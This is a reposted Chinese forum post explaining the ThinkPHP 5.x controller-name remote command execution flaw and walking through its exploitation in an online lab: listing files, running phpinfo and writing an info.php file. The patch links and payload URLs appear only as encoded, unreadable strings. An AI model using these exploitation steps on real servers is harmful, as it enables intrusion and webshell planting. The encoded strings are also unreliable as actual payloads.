-
-
[转帖] ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用
-
发表于: 2018-12-11 01:50
-
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
Thinkphp v5.0.x补丁地址: 31eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1L8%4m8Q4x3X3c8@1K9r3W2F1K9#2)9J5c8X3k6J5j5h3#2W2N6$3!0J5K9#2)9J5c8X3y4G2L8h3#2A6N6q4)9J5c8X3t1%4z5e0N6V1y4K6t1K6y4e0u0W2y4X3t1@1k6h3t1H3k6e0p5I4j5U0k6T1j5K6u0S2x3X3g2X3x3U0f1&6x3o6N6T1y4K6M7#2y4X3j5`.
Thinkphp v5.1.x补丁地址: df6K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6@1L8%4m8Q4x3X3c8@1K9r3W2F1K9#2)9J5c8X3k6J5j5h3#2W2N6$3!0J5K9#2)9J5c8X3y4G2L8h3#2A6N6q4)9J5c8U0R3H3x3X3j5J5z5o6c8T1k6h3x3^5x3U0q4S2y4U0l9^5k6e0M7#2y4o6y4V1z5e0p5I4x3U0k6S2j5X3x3#2z5e0l9I4j5U0t1^5x3e0f1`.
关键代码:
// 获取控制器名
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));
在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
漏洞利用
在线环境地址:557K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2$3N6h3I4F1M7%4m8&6i4K6u0W2j5$3!0E0i4K6u0r3j5$3&6Q4x3X3c8@1K9r3W2F1K9%4m8Z5M7q4)9J5k6o6g2Q4x3X3g2^5i4K6u0V1M7X3y4W2i4K6u0r3
1. 点击右上角的 START TO HACK 按钮创建实验环境
2. 进入实验环境
3. 执行系统命令显示目录下文件
a21K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8D9M7#2)9J5y4e0t1H3i4K6u0V1L8l9`.`.
4. 执行phpinfo
3efK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8H3K9s2m8Q4x3U0f1J5x3q4)9J5k6s2u0Q4x3U0f1J5x3q4)9J5y4%4m8Z5M7r3W2F1k6X3!0Q4x3U0S2Q4x3U0W2Q4x3@1u0Q4x3U0M7`.
5. 写info.php文件
1daK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8H3i4K6u0W2N6Y4y4H3L8r3q4@1k6g2)9J5k6h3#2W2i4K6u0r3M7s2g2T1L8r3W2U0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6K6i4K6y4p5i4K6u0r3K9h3&6V1k6i4S2Q4x3V1k6Q4y4f1y4@1K9r3W2F1K9#2)9#2b7$3q4H3M7q4)9J5c8X3W2F1N6X3!0C8k6h3k6#2L8X3y4@1K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7k6Y4g2F1j5%4c8A6L8$3&6Q4x3@1c8U0j5h3I4D9i4K6g2X3N6i4y4W2M7W2)9#2k6X3k6#2L8X3y4Q4y4h3k6S2M7Y4u0S2P5g2)9J5y4X3q4E0M7q4)9K6b7Y4k6S2M7Y4y4Q4y4f1t1H3i4K6g2p5i4K6y4p5M7%4W2K6N6r3g2E0i4K6t1$3j5h3#2H3i4K6y4n7N6X3q4J5M7#2)9#2b7U0q4Q4y4f1c8Q4y4f1u0Q4y4f1c8Q4x3@1c8W2j5$3S2G2i4K6t1#2x3U0m8Q4x3U0f1J5y4#2)9J5y4X3I4@1i4K6y4n7i4K6y4r3M7r3S2H3i4K6t1#2x3U0m8H3K9s2m8A6L8X3k6G2i4K6t1^5i4K6t1&6i4K6y4n7i4K6y4r3i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0f1J5y4#2)9J5y4e0t1H3i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0f1J5x3r3W2F1k6X3!0Q4x3X3g2H3K9s2l9`.
访问 info.php
